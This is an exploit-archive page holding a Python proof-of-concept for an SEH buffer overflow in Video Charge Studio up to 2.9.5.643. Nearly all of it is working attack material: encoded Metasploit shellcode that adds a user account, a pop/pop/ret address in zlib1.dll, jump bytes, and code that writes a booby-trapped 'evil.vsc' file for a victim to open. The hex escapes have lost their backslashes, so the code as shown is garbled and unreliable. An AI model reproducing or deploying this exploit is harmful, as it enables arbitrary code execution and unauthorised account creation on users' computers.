Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Published : 2010-12-06
# Author : xsploited security
# Previous Title : MediaCoder 0.7.5.4795 .m3u Buffer Overflow (SEH)
# Next Title : Winamp 5.6 Arbitrary Code Execution in MIDI Parser
#!/usr/bin/python
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A

### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.

### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
# "Filename" value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on a users PC without there consent.

### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!

# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer."					-Harry Browne

import struct
import sys

about = "=================================================n"
about +=  " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)n"
about +=  " Author: xsploited securityn URL: http://www.x-sploited.com/n"
about +=  " Contact: xsploitedsecurity [at] gmail.comn"
about +=  "=================================================n"
print about

# msfpayload windows/adduser user=xsploited pass=sec  EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b 'x00x09x0a
# x0dx3ex3cx26x20x21x22x23x2ax07' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)

shellcode = (
"x6ax46x59xd9xeexd9x74x24xf4x5bx81x73x13xce"
"xcfxb0x91x83xebxfcxe2xf4x32x27x39x91xcexcf"
"xd0x18x2bxfex62xf5x45x9dx80x1ax9cxc3x3bxc3"
"xdax44xc2xb9xc1x78xfaxb7xffx30x81x51x62xf3"
"xd1xedxccxe3x90x50x01xc2xb1x56x2cx3fxe2xc6"
"x45x9dxa0x1ax8cxf3xb1x41x45x8fxc8x14x0exbb"
"xfax90x1ex9fx3bxd9xd6x44xe8xb1xcfx1cx53xad"
"x87x44x84x1axcfx19x81x6exffx0fx1cx50x01xc2"
"xb1x56xf6x2fxc5x65xcdxb2x48xaaxb3xebxc5x73"
"x96x44xe8xb5xcfx1cxd6x1axc2x84x3bxc9xd2xce"
"x63x1axcax44xb1x41x47x8bx94xb5x95x94xd1xc8"
"x94x9ex4fx71x96x90xeax1axdcx24x36xccxa4xce"
"x3dx14x77xcfxb0x91x9exa7x81x1axa1x48x4fx44"
"x75x31xbexa3x24xa7x16x04x73x52x4fx44xf2xc9"
"xccx9bx4ex34x50xe4xcbx74xf7x82xbcxa0xdax91"
"x9dx30x65xf2xa3xabx9exf4xb6xaax90xbexadxef"
"xdexf4xbaxefxc5xe2xabxbdx90xe9xbdxbfxdcxfe"
"xa7xbbxd5xf5xeexbcxd5xf2xeexe0xf1xd5x8axef"
"x96xb7xeexa1xd5xe5xeexa3xdfxf2xafxa3xd7xe3"
"xa1xbaxc0xb1x8fxabxddxf8xa0xa6xc3xe5xbcxae"
"xc4xfexbcxbcx90xe9xbdxbfxdcxfexa7xbbxd5xf5"
"xeexe0xf1xd5x8axcfxbax91"
);

header = (
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30"
"x22x20x65x6ex63x6fx64x69x6ex67x3dx22x57x69x6ex64x6fx77x73x2d"
"x31x32x35x32x22x20x3fx3ex3cx63x6fx6ex66x69x67x20x76x65x72x3d"
"x22x32x2ex39x2ex35x2ex36x34x33x22x3ex0dx0ax3cx63x6fx6cx73x20"
"x6ex61x6dx65x3dx22x46x69x6cx65x73x22x2fx3ex0dx0ax3cx63x6fx6c"
"x73x20x6ex61x6dx65x3dx22x50x72x6fx66x69x6cx65x73x22x3ex0dx0a"
"x3cx50x72x6fx70x65x72x74x79x20x6ex61x6dx65x3dx22x50x72x6fx66"
"x69x6cx65x22x3ex0dx0ax3cx63x6fx6cx73x20x6ex61x6dx65x3dx22x46"
"x6fx72x6dx61x74x73x22x3ex0dx0ax3cx50x72x6fx70x65x72x74x79x20"
"x6ex61x6dx65x3dx22x46x6fx72x6dx61x74x22x3ex0dx0ax3cx56x61x6c"
"x75x65x20x6ex61x6dx65x3dx22x4ex61x6dx65x22x20x74x79x70x65x3d"
"x22x38x22x20x76x61x6cx75x65x3dx22"
);

footer = (
"x22x2fx3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0dx0a"
"x3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0d"
"x0ax3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx63x6fx6ex66x69x67x3e"
);

size = 824; #824 junk bytes triggers the bof

payload = "x90" * (size - len(shellcode));
payload += shellcode

payload += "xEBx06x90x90"; #jmp short
payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += "xe9xe0xfcxffxff"; #jmp back 800 bytes

xsploit = header + payload  + footer;

print("[*] Creating .vsc file");
print "[*] Payload size = " + str(len(payload)) + " bytes";

try:
	out_file = open("evil.vsc",'w');
	out_file.write(xsploit);
	out_file.close();
	print("[*] Malicious vsc file created successfully");
	print("[*] Launch Video Charge Studio and load the filen[*] Exiting...rn");
except:
	print "[!] Error creating file";